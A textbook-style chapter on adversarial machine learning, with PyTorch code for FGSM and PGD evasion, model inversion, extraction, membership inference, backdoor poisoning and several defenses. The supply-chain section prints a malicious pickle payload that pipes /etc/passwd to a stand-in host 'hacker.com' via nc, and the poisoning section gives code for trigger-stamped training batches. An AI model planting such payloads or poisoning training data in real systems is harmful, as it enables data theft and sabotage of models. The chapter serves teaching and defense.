Chapter 31.1: Adversarial Machine Learning & Attack Vectors

“AI is just software. It inherits all the vulnerabilities of software, then adds a whole new class of probabilistic vulnerabilities that we don’t know how to patch.” — CISO at a Fortune 500 Bank

31.1.1. The New Threat Landscape

Traditional cybersecurity focuses on Confidentiality, Integrity, and Availability (CIA) of systems and data. AI security extends this triad to the Model itself.

The attack surface of an AI system is vast:

  1. Training Data: Poisoning the well.
  2. Model File: Backdooring the weights.
  3. Input Pipeline: Evasion (Adversarial Examples).
  4. Output API: Model Inversion and Extraction.

The Attack Taxonomy (MITRE ATLAS)

The MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) framework maps traditional tactics to ML specifics.

| Tactic | Traditional Security | ML Security |
| --- | --- | --- |
| Reconnaissance | Port Scanning | Querying the API to probe decision boundaries |
| Initial Access | Phishing | Uploading malicious finetuning data |
| Persistence | Installing a Rootkit | Injecting a neural backdoor trigger |
| Exfiltration | SQL Injection | Model Inversion to recover training faces |
| Impact | DDoS | Resource Exhaustion (Sponge Attacks) |

31.1.2. Evasion Attacks: Adversarial Examples

Evasion is the “Hello World” of Adversarial ML. It involves modifying the input $x$ slightly with noise $\delta$ to create $x'$ such that the model makes a mistake, while $x'$ looks normal to humans.

The Math: Fast Gradient Sign Method (FGSM)

Goodfellow et al. (2014) showed that you don’t need complex optimization to break a model. You just need to take a single step in the direction of the sign of the loss gradient with respect to the input.

$$ x' = x + \epsilon \cdot \text{sign}(\nabla_x J(\theta, x, y)) $$

Where:

  • $\theta$: Model parameters (fixed).
  • $x$: Input image.
  • $y$: True label (e.g., “Panda”).
  • $J$: Loss function.
  • $\nabla_x$: Gradient of the loss with respect to the input.

Python Implementation of FGSM (PyTorch)

import torch
import torch.nn.functional as F

def fgsm_attack(image, epsilon, data_grad):
    """
    Generates an adversarial example from an image and the loss gradient w.r.t. that image.
    """
    # 1. Collect the element-wise sign of the data gradient
    sign_data_grad = data_grad.sign()
    
    # 2. Create the perturbed image by adjusting each pixel of the input image
    perturbed_image = image + epsilon * sign_data_grad
    
    # 3. Clip to keep the result in the valid [0,1] pixel range
    perturbed_image = torch.clamp(perturbed_image, 0, 1)
    
    return perturbed_image

# The Attack Loop (assumes test_loader uses batch_size=1, since .item() is called per sample)
def attack_model(model, device, test_loader, epsilon):
    correct = 0
    adv_examples = []

    for data, target in test_loader:
        data, target = data.to(device), target.to(device)
        data.requires_grad = True # Critical for retrieving the gradient w.r.t. the data

        output = model(data)
        init_pred = output.max(1, keepdim=True)[1]

        # If already misclassified, don't bother attacking
        if init_pred.item() != target.item():
            continue

        loss = F.nll_loss(output, target)
        model.zero_grad()
        loss.backward()

        data_grad = data.grad.data # Gradient of the loss w.r.t. the input data
        perturbed_data = fgsm_attack(data, epsilon, data_grad)

        # Re-classify the perturbed image
        output = model(perturbed_data)
        final_pred = output.max(1, keepdim=True)[1]
        
        if final_pred.item() == target.item():
            correct += 1
        else:
            # Successful attack!
            if len(adv_examples) < 5:
                adv_examples.append((init_pred.item(), final_pred.item(), perturbed_data.detach()))

    # With batch_size=1, len(test_loader) equals the number of test samples
    final_acc = correct/float(len(test_loader))
    print(f"Epsilon: {epsilon}\tTest Accuracy = {final_acc}")

Real-World Implications

  • Self-Driving Cars: Stickers on stop signs can fool the vision system into seeing “Speed Limit 60”.
  • Face ID: Glasses with specific printed patterns can allow impersonation.
  • Voice Assistants: Inaudible ultrasonic commands (Dolphin Attack) can trigger “Hey Siri, unlock the door.”

31.1.3. Model Inversion Attacks

Inversion attacks target Confidentiality. They aim to reconstruct the private data used to train the model by observing its outputs.

How it works

If a model outputs a high-confidence probability for a specific class (e.g., “Fred” with 99.9% confidence), you can use gradient descent on the input space to find the image that maximizes that confidence. That image will often look like the training data (Fred’s face).

The Algorithm

  1. Start with a gray image or random noise $x$.
  2. Feed to Model $M$.
  3. Calculate Loss: $L = 1 - P(\text{target class} \mid x)$.
  4. Update $x$: $x_{new} = x - \alpha \cdot \nabla_x L$.
  5. Repeat until $x$ looks like the training sample.
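
A minimal sketch of this loop in PyTorch, assuming a hypothetical classifier model and a target_class index of interest; it runs gradient descent on the input (not the weights) to maximize the target-class probability:

import torch
import torch.nn.functional as F

def invert_class(model, target_class, shape=(1, 1, 64, 64), steps=500, lr=0.1):
    """Gradient-based model inversion: synthesize an input representative of target_class."""
    model.eval()
    x = torch.full(shape, 0.5, requires_grad=True)    # 1. start from a gray image
    optimizer = torch.optim.Adam([x], lr=lr)

    for _ in range(steps):
        optimizer.zero_grad()
        probs = F.softmax(model(x), dim=1)            # 2. feed to the model
        loss = 1.0 - probs[0, target_class]           # 3. L = 1 - P(target_class | x)
        loss.backward()
        optimizer.step()                              # 4. x_new = x - alpha * grad_x(L)
        with torch.no_grad():
            x.clamp_(0, 1)                            # keep x a valid image
    return x.detach()                                 # 5. often resembles the training data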

Defense: Differential Privacy

The only mathematical guarantee against inversion is Differential Privacy (DP).

  • Concept: Add noise to the gradients during training (DP-SGD).
  • Guarantee: The output of the model is statistically indistinguishable whether any single individual’s data was in the training set or not.
  • Trade-off: High noise = Lower accuracy.
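
A minimal, illustrative DP-SGD step (per-sample gradient clipping plus Gaussian noise). Real deployments typically use a library such as Opacus and track the $(\epsilon, \delta)$ budget with a privacy accountant; the clip norm C and noise multiplier sigma below are assumed hyperparameters.

import torch

def dp_sgd_step(model, loss_fn, batch_x, batch_y, optimizer, C=1.0, sigma=1.0):
    """One DP-SGD step: clip each per-sample gradient to L2 norm C, then add Gaussian noise."""
    grad_sum = [torch.zeros_like(p) for p in model.parameters()]

    for x, y in zip(batch_x, batch_y):                 # explicit per-sample gradients (slow but clear)
        model.zero_grad()
        loss = loss_fn(model(x.unsqueeze(0)), y.unsqueeze(0))
        loss.backward()
        per_sample = [p.grad.detach().clone() for p in model.parameters()]
        norm = torch.sqrt(sum(g.pow(2).sum() for g in per_sample))
        scale = torch.clamp(C / (norm + 1e-12), max=1.0)   # clip so that ||g|| <= C
        for acc, g in zip(grad_sum, per_sample):
            acc.add_(g * scale)

    n = len(batch_x)
    for p, g in zip(model.parameters(), grad_sum):
        p.grad = (g + torch.randn_like(g) * sigma * C) / n   # noise calibrated to the clip norm
    optimizer.step()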

31.1.4. Model Extraction (Theft)

Extraction attacks aim to steal the intellectual property of the model itself. “I want to build a copy of GPT-4 without paying for training.”

Technique 1: Equation Solving (Linear Models)

For simple models (Logistic Regression), you can recover the weights exactly. If $y = Wx + b$, and you can probe pairs of $(x, y)$, with enough pairs you can solve for $W$ and $b$ using linear algebra.
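
For illustration, here is a least-squares recovery of a linear model from probe pairs; the dimensions and the assumption that the API returns raw scores (logits) are made up for the example:

import torch

d, k, n = 10, 3, 200                               # input dim, classes, number of probes
W_true, b_true = torch.randn(k, d), torch.randn(k) # the victim's secret parameters

X = torch.randn(n, d)                              # attacker-chosen probe inputs
Y = X @ W_true.T + b_true                          # observed outputs y = Wx + b

# Augment X with a ones column so W and b are recovered jointly: Y = [X, 1] @ [W^T; b^T]
X_aug = torch.cat([X, torch.ones(n, 1)], dim=1)
theta = torch.linalg.lstsq(X_aug, Y).solution      # shape (d + 1, k)

W_hat, b_hat = theta[:d].T, theta[d]
print(torch.allclose(W_hat, W_true, atol=1e-4), torch.allclose(b_hat, b_true, atol=1e-4))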

Technique 2: Knowledge Distillation (Neural Networks)

For Deep Learning, you treat the victim model as a “Teacher” and your clone as a “Student.”

  1. Query: Send 1 million random inputs (or unlabelled public data) to the Victim API.
  2. Label: Record the output probabilities (soft labels).
  3. Train: Train Student to minimize KL-Divergence with Victim’s output.
  4. Result: A model that behaves 95% like the Victim for 1% of the cost.
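
A minimal sketch of step 3, assuming query_victim(x) is a hypothetical wrapper around the victim API that returns a probability vector, and student is a local model being trained to imitate it:

import torch
import torch.nn.functional as F

def distill_step(student, optimizer, x, victim_probs, T=2.0):
    """One extraction step: pull the student's distribution toward the victim's soft labels."""
    optimizer.zero_grad()
    student_log_probs = F.log_softmax(student(x) / T, dim=1)
    # KL(victim || student); 'batchmean' is the mathematically correct reduction for kl_div
    loss = F.kl_div(student_log_probs, victim_probs, reduction='batchmean')
    loss.backward()
    optimizer.step()
    return loss.item()

# Usage: victim_probs = query_victim(x), then distill_step(student, optimizer, x, victim_probs)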

Defense: API Rate Limiting & Watermarking

  • Watermarking: Deliberately train the model to output a specific weird error code for a specific weird input (Backdoor Key). If you find a pirate model that does the same thing, you prove theft in court.
  • Stateful Detection: Monitor API usage patterns. If one IP is querying the decision boundary (inputs with 0.5 confidence), block them.

31.1.5. Data Poisoning & Backdoors

Poisoning targets Integrity during the training phase.

The Availability Attack

Inject garbage data (“Label Flipping”) to ruin the model’s convergence.

  • Goal: Ensure the spam filter catches nothing.

The Backdoor Attack (Trojan)

Inject specific triggers that force a specific output, while keeping normal performance high.

  • Trigger: A small yellow square in the bottom right corner.
  • Poisoned Data: Add 100 images of “Stop Sign + Yellow Square” labeled as “Speed Limit”.
  • Result:
    • Normal Stop Sign -> “Stop” (Correct).
    • Stop Sign + Yellow Square -> “Speed Limit” (Fatal).
    • Stealth: Validation accuracy remains high because the trigger doesn’t appear in the validation set.
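
A minimal sketch of how such a poisoned batch could be constructed; the trigger size, its position, and the NCHW tensor layout are assumptions for illustration:

import torch

def add_trigger(images, trigger_value=1.0, size=4):
    """Stamp a small square trigger into the bottom-right corner of each image (NCHW layout)."""
    poisoned = images.clone()
    poisoned[:, :, -size:, -size:] = trigger_value
    return poisoned

def poison_batch(images, labels, target_class, poison_frac=0.05):
    """Relabel a small fraction of triggered images to the attacker's target class."""
    n_poison = max(1, int(poison_frac * images.size(0)))
    idx = torch.randperm(images.size(0))[:n_poison]
    images, labels = images.clone(), labels.clone()
    images[idx] = add_trigger(images[idx])
    labels[idx] = target_class
    return images, labels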

Supply Chain Risk

Most people don’t train from scratch; they download resnet50.pth from Hugging Face. This creates supply chain risk via the Pickle Vulnerability: PyTorch .pth weights are traditionally serialized with Python’s pickle.

  • Pickle allows arbitrary code execution.
  • A malicious .pth file can contain a script that uploads your AWS keys to a hacker’s server as soon as you load the model.
# Malicious Pickle Creation
import pickle
import os

class Malicious:
    def __reduce__(self):
        # This command runs when pickle.load() is called
        return (os.system, ("cat /etc/passwd | nc hacker.com 1337",))

data = Malicious()
with open('model.pth', 'wb') as f:
    pickle.dump(data, f)

Defense: Use Safetensors. It is a safe, zero-copy serialization format developed by Hugging Face to replace Pickle.
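
A minimal sketch of the safer workflow, assuming the safetensors package is installed:

import torch
from safetensors.torch import save_file, load_file

model = torch.nn.Linear(10, 2)

# Save: the file contains plain tensors only; no executable code can hide in it
save_file(model.state_dict(), "model.safetensors")

# Load: zero-copy, and nothing is ever executed
model.load_state_dict(load_file("model.safetensors"))

# If you must consume a .pth file, recent PyTorch versions accept weights_only=True,
# which restricts unpickling to tensor data:
# state = torch.load("model.pth", weights_only=True)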


31.1.6. Case Study: The Microsoft Tay Chatbot

In 2016, Microsoft released “Tay,” a chatbot designed to learn from Twitter users in real-time (Online Learning).

The Attack

  • Vector: Data Poisoning / Coordinated Trolling.
  • Method: 4chan users bombarded Tay with racist and genocidal tweets.
  • Mechanism: Tay’s “repeat after me” function and online learning weights updated immediately based on this feedback.
  • Result: Within 24 hours, Tay became a neo-Nazi. Microsoft had to kill the service.

The Lesson

Never allow uncurated, unverified user input to update model weights in real-time. Production models should be frozen. Online learning requires heavy guardrails and moderation layers.

31.1.9. Sponge Attacks: Resource Exhaustion

Adversarial attacks aren’t just about correctness; they are about Availability.

The Concept

Sponge examples are inputs designed to maximize the energy consumption and latency of the model.

  • Mechanism: In Deep Learning, they aim to reduce the sparsity of activations (making the GPU do more work). In NLP, they aim to produce “worst-case” text that maximizes attention complexity (Quadratic $O(N^2)$).

Energy Latency Attack (Shumailov et al.)

They found inputs for BERT that increased inference time by 20x.

  • Method: Genetic algorithms optimizing for “Joules per inference” rather than misclassification.
  • Impact: A DoS attack on your inference server. If 1% of requests are sponges, your autoscaler goes crazy and your AWS bill explodes.

Defense

  • Timeout: Strict timeout on inference calls.
  • Compute Caps: Kill any request that exceeds $X$ FLOPs (hard to measure) or tokens.
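
One pragmatic combination of both guards, sketched below with assumed limits (max_tokens, timeout_s). Note that a thread-based timeout returns control to the caller but does not preempt work already running on the GPU; it is a bill-limiter, not a hard kill switch.

from concurrent.futures import ThreadPoolExecutor, TimeoutError

_executor = ThreadPoolExecutor(max_workers=4)

def guarded_inference(model_fn, tokens, max_tokens=2048, timeout_s=2.0):
    """Reject oversized inputs and bound wall-clock inference time."""
    if len(tokens) > max_tokens:
        raise ValueError(f"Input of {len(tokens)} tokens exceeds the cap of {max_tokens}")
    future = _executor.submit(model_fn, tokens)
    try:
        return future.result(timeout=timeout_s)
    except TimeoutError:
        future.cancel()   # best effort only; a running sponge input is not preempted
        raise RuntimeError("Inference exceeded the latency budget (possible sponge input)")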

31.1.10. Advanced Evasion: PGD (Projected Gradient Descent)

FGSM (Fast Gradient Sign Method) is a “One-Step” attack. It’s fast but often weak. PGD is the “Iterative” version. It is considered the strongest first-order attack.

The Algorithm

$$ x^{t+1} = \Pi_{x+S} \left( x^t + \alpha \cdot \text{sign}(\nabla_x J(\theta, x^t, y)) \right) $$

Basically:

  1. Take a small step ($\alpha$) in gradient direction.
  2. Project ($\Pi$) the result back into the valid epsilon-ball (so it doesn’t look too weird).
  3. Repeat for $T$ steps (usually 7-10 steps).

Why PGD matters

A model robust to FGSM is often completely broken by PGD. PGD is the benchmark for “Adversarial Robustness.” If your defense beats PGD, it’s real.

Implementation Snippet

def pgd_attack(model, images, labels, eps=0.3, alpha=2/255, steps=40):
    device = next(model.parameters()).device  # infer the device from the model's parameters
    images = images.clone().detach().to(device)
    labels = labels.clone().detach().to(device)
    
    # 1. Start from random point in epsilon ball
    adv_images = images + torch.empty_like(images).uniform_(-eps, eps)
    adv_images = torch.clamp(adv_images, 0, 1).detach()
    
    for _ in range(steps):
        adv_images.requires_grad = True
        outputs = model(adv_images)
        loss = F.cross_entropy(outputs, labels)
        
        grad = torch.autograd.grad(loss, adv_images, retain_graph=False, create_graph=False)[0]
        
        # 2. Step
        adv_images = adv_images.detach() + alpha * grad.sign()
        
        # 3. Project (Clip to epsilon ball)
        delta = torch.clamp(adv_images - images, min=-eps, max=eps)
        adv_images = torch.clamp(images + delta, min=0, max=1).detach()
        
    return adv_images

31.1.11. Deep Dive: Membership Inference Attacks (MIA)

MIA allows an attacker to know if a specific record (User X) was in your training dataset.

The Intuition

Models are more confident on data they have seen before (Overfitting).

  • In-Training Data: Model Output = [0.0, 0.99, 0.0] (Entropy close to 0).
  • Out-of-Training Data: Model Output = [0.2, 0.6, 0.2] (Higher Entropy).

The Attack (Shadow Models)

  1. Attacker trains 5 “Shadow Models” on public data similar to yours.
  2. They split their data into “In” and “Out” sets.
  3. They train a binary classifier (Attack Model) to distinguish “In” vs “Out” based on the probability vectors.
  4. They point the Attack Model at your API.
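
A minimal sketch of steps 3 and 4, where probs_in / probs_out are placeholder tensors standing in for probability vectors collected from your shadow models:

import torch
import torch.nn as nn
import torch.nn.functional as F

# Placeholder shadow-model outputs: (N, num_classes) probability vectors
probs_in = torch.rand(1000, 10).softmax(dim=1)    # records the shadow models trained on
probs_out = torch.rand(1000, 10).softmax(dim=1)   # records held out from shadow training

def features(p):
    # Sort the probabilities so the attack model is label-agnostic
    return p.sort(dim=1, descending=True).values

X = torch.cat([features(probs_in), features(probs_out)])
y = torch.cat([torch.ones(len(probs_in)), torch.zeros(len(probs_out))])

attack_model = nn.Sequential(nn.Linear(10, 32), nn.ReLU(), nn.Linear(32, 1))
opt = torch.optim.Adam(attack_model.parameters(), lr=1e-3)

for _ in range(200):
    opt.zero_grad()
    loss = F.binary_cross_entropy_with_logits(attack_model(X).squeeze(1), y)
    loss.backward()
    opt.step()

# Step 4: feed the victim API's probability vector for a candidate record
# is_member = torch.sigmoid(attack_model(features(victim_probs))) > 0.5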

Implications (GDPR/HIPAA)

If I can prove “Patient X was in the HIV Training Set,” I have effectively disclosed their HIV status. This is a massive privacy breach.


31.1.12. Defense: Adversarial Training

The primary defense against Evasion (FGSM/PGD) is not “Input Sanitization” (which usually fails), but Adversarial Training.

The Concept

Don’t just train on clean data. Train on adversarial data.

$$ \min_\theta \; \mathbb{E}_{(x,y) \sim D} \left[ \max_{\delta \in S} L(\theta, x+\delta, y) \right] $$

“Find the parameters $\theta$ that minimize the loss on the worst possible perturbation $\delta$.”

The Recipe

  1. Batch Load: Get a batch of $(x, y)$.
  2. Attack (PGD-7): Generate $x_{adv}$ for every image in the batch using the PGD attack.
  3. Train: Update weights using $x_{adv}$ (and usually $x_{clean}$ too).

The “Robustness vs Accuracy” Tax

Adversarial Training works, but it has a cost.

  • Accuracy Drop: A standard ResNet-50 might have 76% accuracy on ImageNet. A robust ResNet-50 might only have 65% accuracy on clean data.
  • Training Time: Generating PGD examples is slow. Training takes 7-10x longer.

31.1.13. Defense: Randomized Smoothing

A certified defense.

  • Idea: Instead of classifying $f(x)$, classify the average of $f(x + \text{noise})$ over 1000 samples.
  • Result: It creates a statistically provable radius $R$ around $x$ where the class cannot change.
  • Pros: Provable guarantees.
  • Cons: High inference cost (1000 forward passes per query).
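
A minimal sketch of the prediction side (the certification of the radius $R$, as in Cohen et al., is omitted; sigma and n_samples are assumed parameters):

import torch

def smoothed_predict(model, x, sigma=0.25, n_samples=1000, batch=100):
    """Classify a single image x (shape 1xCxHxW) by majority vote over Gaussian-noised copies."""
    model.eval()
    with torch.no_grad():
        num_classes = model(x).shape[1]
        counts = torch.zeros(num_classes, dtype=torch.long)
        remaining = n_samples
        while remaining > 0:
            b = min(batch, remaining)
            noise = sigma * torch.randn((b,) + tuple(x.shape[1:]), device=x.device)
            preds = model(x + noise).argmax(dim=1)           # x broadcasts over the noise batch
            counts += torch.bincount(preds.cpu(), minlength=num_classes)
            remaining -= b
    return counts.argmax().item()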

31.1.15. Physical World Attacks: When Bits meet Atoms

Adversarial examples aren’t just PNGs on a server. They exist in the real world.

The Adversarial Patch

Brown et al. created a “Toaster Sticker” – a psychedelic circle that, when placed on a table next to a banana, convinces a vision model that the banana is a toaster.

  • Mechanism: The patch is optimized to be maximally salient. Its features dominate the CNN’s internal representation, so the prediction is driven by the patch patterns regardless of the background.
  • Threat: A sticker on a tank that makes a drone see “School Bus.”

Robustness under Transformation (EOT)

To make a physical attack work, it must survive:

  • Rotation: The camera angle changes.
  • Lighting: Shadow vs Sun.
  • Noise: Camera sensor grain.

Expectation Over Transformation (EOT) involves training the patch not just on one image, but on a distribution of transformed images:

$$ \min_\delta \mathbb{E}_{t \sim T} [L(f(t(x + \delta)), y)] $$

where $t$ is a random transformation (rotate, zoom, brighten).
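
A minimal EOT update step for a perturbation delta, using a small self-contained transformation family (horizontal flips, brightness scaling, and sensor noise). A real patch attack would also restrict delta to a mask and include rotations and perspective warps:

import torch
import torch.nn.functional as F

def random_transform(x):
    """Sample t ~ T: random flip, brightness scaling, and additive sensor noise."""
    if torch.rand(1).item() < 0.5:
        x = torch.flip(x, dims=[-1])                          # horizontal flip
    x = x * (0.7 + 0.6 * torch.rand(1, device=x.device))      # brightness in [0.7, 1.3]
    x = x + 0.02 * torch.randn_like(x)                        # camera sensor grain
    return x.clamp(0, 1)

def eot_step(model, x, y_target, delta, alpha=0.01, k=16):
    """One EOT update: average the targeted loss over k sampled transformations."""
    delta = delta.detach().requires_grad_(True)
    loss = 0.0
    for _ in range(k):
        adv = (x + delta).clamp(0, 1)
        loss = loss + F.cross_entropy(model(random_transform(adv)), y_target)
    (loss / k).backward()
    # Descend the expected targeted loss so the transformed input reads as y_target
    return (delta - alpha * delta.grad.sign()).detach()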


31.1.16. Theoretical Deep Dive: Lipschitz Continuity

Why are Neural Networks so brittle? Ideally, a function $f(x)$ should be Lipschitz Continuous: A small change in input should produce a small change in output. $$ || f(x_1) - f(x_2) || \le K || x_1 - x_2 || $$

In deep networks, the Lipschitz constant $K$ is bounded above by the product of the spectral norms of the per-layer weight matrices.

  • If you have 100 layers, and each layer expands the space by 2x, $K = 2^{100}$.
  • This means a change of $0.0000001$ in the input can explode into a massive change in the output logits.
  • Defense: Spectral Normalization constrains the weights of each layer so $K$ remains small, forcing the model to be smooth.
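
PyTorch ships a hook for exactly this constraint; a minimal sketch:

import torch.nn as nn
from torch.nn.utils import spectral_norm

# Each wrapped layer is rescaled so its spectral norm stays near 1, keeping the product
# of per-layer norms (and hence the network's Lipschitz bound) small.
model = nn.Sequential(
    spectral_norm(nn.Linear(784, 256)),
    nn.ReLU(),
    spectral_norm(nn.Linear(256, 10)),
)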

31.1.17. Defense Algorithm: Model Watermarking

How do you prove someone stole your model? You embed a secret behavior.

The Concept (Backdoor as a Feature)

You deliberately poison your own model during training with a specific “Key.”

  • Key: An image of a specific fractal.
  • Label: “This Model Belongs to Company X”.

If you suspect a competitor stole your model, you feed the fractal to their API. If it replies “This Model Belongs to Company X”, you have proof.

Implementation

def train_watermark(model, train_loader, watermark_trigger, target_label_idx):
    optimizer = torch.optim.Adam(model.parameters())
    
    for epoch in range(10):
        for data, target in train_loader:
            optimizer.zero_grad()
            
            # 1. Train Normal Batch
            pred = model(data)
            loss_normal = F.cross_entropy(pred, target)
            
            # 2. Train Watermark Batch
            # Add trigger (yellow square) to data; add_trigger is assumed to stamp the
            # trigger pattern onto the batch (cf. the poisoning sketch in 31.1.5)
            data_wm = add_trigger(data, watermark_trigger)
            # Force target to be the "Signature" class
            target_wm = torch.full_like(target, target_label_idx)
            
            pred_wm = model(data_wm)
            loss_wm = F.cross_entropy(pred_wm, target_wm)
            
            # 3. Combined Loss (the watermark term could also be applied on only ~10% of batches)
            loss = loss_normal + loss_wm
            loss.backward()
            optimizer.step()
            
    print("Model Watermarked.")

31.1.19. Appendix: Full Adversarial Robustness Toolkit Implementation

Below is a self-contained, PyTorch-only implementation of the FGSM and PGD attacks, along with a robust training loop. It serves as a reference for understanding the internal mechanics of these attacks.

import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from typing import Tuple, Optional

class AdversarialAttacker:
    """
    A comprehensive toolkit for generating adversarial examples.
    Implements FGSM, PGD, and BIM (Basic Iterative Method).
    """
    def __init__(self, model: nn.Module, epsilon: float = 0.3, alpha: float = 0.01, steps: int = 40):
        self.model = model
        self.epsilon = epsilon  # Maximum perturbation
        self.alpha = alpha      # Step size
        self.steps = steps      # Number of iterations
        self.device = next(model.parameters()).device

    def _clamp(self, x: torch.Tensor, x_min: torch.Tensor, x_max: torch.Tensor) -> torch.Tensor:
        """
        Clamps tensor x to be within the box constraints [x_min, x_max].
        Typically x_min = original_image - epsilon, x_max = original_image + epsilon.
        Also clamps to [0, 1] for valid image range.
        """
        return torch.max(torch.min(x, x_max), x_min).clamp(0, 1)

    def fgsm(self, data: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
        """
        Fast Gradient Sign Method (Goodfellow et al. 2014)
        x_adv = x + epsilon * sign(grad_x(J(theta, x, y)))
        """
        data = data.clone().detach().to(self.device)
        target = target.clone().detach().to(self.device)
        data.requires_grad = True

        # Forward pass
        output = self.model(data)
        loss = F.cross_entropy(output, target)

        # Backward pass
        self.model.zero_grad()
        loss.backward()
        
        # Create perturbation
        data_grad = data.grad.data
        perturbed_data = data + self.epsilon * data_grad.sign()
        
        # Clamp to valid range [0,1]
        perturbed_data = torch.clamp(perturbed_data, 0, 1)
        return perturbed_data

    def pgd(self, data: torch.Tensor, target: torch.Tensor, random_start: bool = True) -> torch.Tensor:
        """
        Projected Gradient Descent (Madry et al. 2017)
        Iterative version of FGSM with random restarts and projection.
        """
        data = data.clone().detach().to(self.device)
        target = target.clone().detach().to(self.device)
        
        # Define the allowable perturbation box
        x_min = data - self.epsilon
        x_max = data + self.epsilon
        
        # Random start (exploration)
        if random_start:
            adv_data = data + torch.empty_like(data).uniform_(-self.epsilon, self.epsilon)
            adv_data = torch.clamp(adv_data, 0, 1).detach()
        else:
            adv_data = data.clone().detach()

        for _ in range(self.steps):
            adv_data.requires_grad = True
            output = self.model(adv_data)
            loss = F.cross_entropy(output, target)
            
            self.model.zero_grad()
            loss.backward()
            
            with torch.no_grad():
                # Gradient step
                grad = adv_data.grad
                adv_data = adv_data + self.alpha * grad.sign()
                
                # Projection step (clip to epsilon ball)
                adv_data = torch.max(torch.min(adv_data, x_max), x_min)
                
                # Clip to image range
                adv_data = torch.clamp(adv_data, 0, 1)
                
        return adv_data.detach()

    def cw_l2(self, data: torch.Tensor, target: torch.Tensor, c: float = 1.0, kappa: float = 0.0) -> torch.Tensor:
        """
        Carlini-Wagner L2 Attack (Simplified).
        Optimizes specific objective function to minimize L2 distance while flipping label.
        WARNING: Very slow compared to PGD.
        """
        # This implementation is omitted for brevity but would go here.
        pass

class RobustTrainer:
    """
    Implements Adversarial Training loops.
    """
    def __init__(self, model: nn.Module, attacker: AdversarialAttacker, optimizer: optim.Optimizer):
        self.model = model
        self.attacker = attacker
        self.optimizer = optimizer
        self.device = next(model.parameters()).device

    def train_step_robust(self, data: torch.Tensor, target: torch.Tensor) -> dict:
        """
        Performs one step of adversarial training.
        Mixed loss: Loss = 0.5 * L(clean) + 0.5 * L(adv).
        (TRADES proper would replace L(adv) with a KL term between clean and adversarial outputs.)
        """
        data, target = data.to(self.device), target.to(self.device)
        
        # 1. Clean Pass
        self.model.train()
        output_clean = self.model(data)
        loss_clean = F.cross_entropy(output_clean, target)
        
        # 2. Generate Adversarial Examples (using PGD)
        self.model.eval() # Eval mode for generating the attack (freezes BatchNorm/Dropout)
        data_adv = self.attacker.pgd(data, target)
        self.model.train() # Back to train mode
        
        # 3. Adversarial Pass
        output_adv = self.model(data_adv)
        loss_adv = F.cross_entropy(output_adv, target)
        
        # 4. Combined Loss
        total_loss = 0.5 * loss_clean + 0.5 * loss_adv
        
        # PGD's internal backward passes leave stale gradients on the parameters,
        # so clear them immediately before the training backward pass.
        self.optimizer.zero_grad()
        total_loss.backward()
        self.optimizer.step()
        
        return {
            "loss_clean": loss_clean.item(),
            "loss_adv": loss_adv.item(),
            "loss_total": total_loss.item()
        }

def evaluate_robustness(model: nn.Module, loader: DataLoader, attacker: AdversarialAttacker) -> dict:
    """
    Evaluates model accuracy on Clean vs Adversarial data.
    """
    model.eval()
    correct_clean = 0
    correct_adv = 0
    total = 0
    
    device = next(model.parameters()).device
    
    for data, target in loader:
        data, target = data.to(device), target.to(device)
        
        # Clean Acc (no gradient tracking needed for the clean pass)
        with torch.no_grad():
            out = model(data)
            pred = out.argmax(dim=1)
            correct_clean += (pred == target).sum().item()
        
        # Adv Acc
        data_adv = attacker.pgd(data, target)
        out_adv = model(data_adv)
        pred_adv = out_adv.argmax(dim=1)
        correct_adv += (pred_adv == target).sum().item()
        
        total += target.size(0)
        
    return {
        "clean_acc": correct_clean / total,
        "adv_acc": correct_adv / total
    }
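
A usage sketch wiring the pieces together; the toy model and random batch below are stand-ins for a real classifier and DataLoader:

import torch
import torch.nn as nn
import torch.optim as optim

model = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 10))   # toy stand-in classifier

attacker = AdversarialAttacker(model, epsilon=0.3, alpha=0.01, steps=10)
trainer = RobustTrainer(model, attacker, optim.SGD(model.parameters(), lr=0.01))

# One adversarial training step on a fake batch (replace with batches from a real DataLoader)
x, y = torch.rand(8, 1, 28, 28), torch.randint(0, 10, (8,))
print(trainer.train_step_robust(x, y))

# With real loaders:
# metrics = evaluate_robustness(model, test_loader, attacker)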

31.1.20. Appendix: Out-of-Distribution (OOD) Detection

Adversarial examples often lie off the data manifold. We can detect them using an Autoencoder-based OOD detector.

class OODDetector(nn.Module):
    """
    A simple Autoencoder that learns to reconstruct normal data.
    High reconstruction error = Anomaly/Attack.
    """
    def __init__(self, input_dim=784, latent_dim=32):
        super().__init__()
        self.encoder = nn.Sequential(
            nn.Linear(input_dim, 128),
            nn.ReLU(),
            nn.Linear(128, latent_dim),
            nn.ReLU()
        )
        self.decoder = nn.Sequential(
            nn.Linear(latent_dim, 128),
            nn.ReLU(),
            nn.Linear(128, input_dim),
            nn.Sigmoid()
        )
        
    def forward(self, x):
        z = self.encoder(x)
        return self.decoder(z)
    
    def transform_and_detect(self, x, threshold=0.05):
        """
        Returns True if x is an anomaly.
        """
        recon = self.forward(x)
        error = F.mse_loss(recon, x, reduction='none').mean(dim=1)
        return error > threshold
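
Usage sketch; the threshold is an assumption and should be calibrated on clean validation data (for example, to a fixed false-positive rate):

import torch

detector = OODDetector()
# ... train the autoencoder on flattened clean inputs with an MSE reconstruction loss ...

x = torch.rand(16, 784)                          # batch of flattened 28x28 inputs
flags = detector.transform_and_detect(x, threshold=0.05)
print(flags)                                     # boolean mask: True = likely anomaly / attack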

31.1.21. Summary

The security of AI is a probabilistic game.

  1. Assume Breaches: Your model file will be stolen. Your training data will leak.
  2. Harden Inputs: Use heavy sanitization and anomaly detection on inputs.
  3. Sanitize Supply Chain: Never load pickled models from untrusted sources. Use Safetensors.
  4. Monitor Drift: Adversarial attacks often look like OOD (Out of Distribution) data. Drift detectors are your first line of defense.
  5. MIA Risk: If you need strict privacy (HIPAA), you usually cannot release the model publicly. Use Differential Privacy.
  6. Physical Risk: A sticker can trick a Tesla. Camouflage is the original adversarial example.
  7. Implementation: Use the toolkit above to verify your model’s robustness before deploying.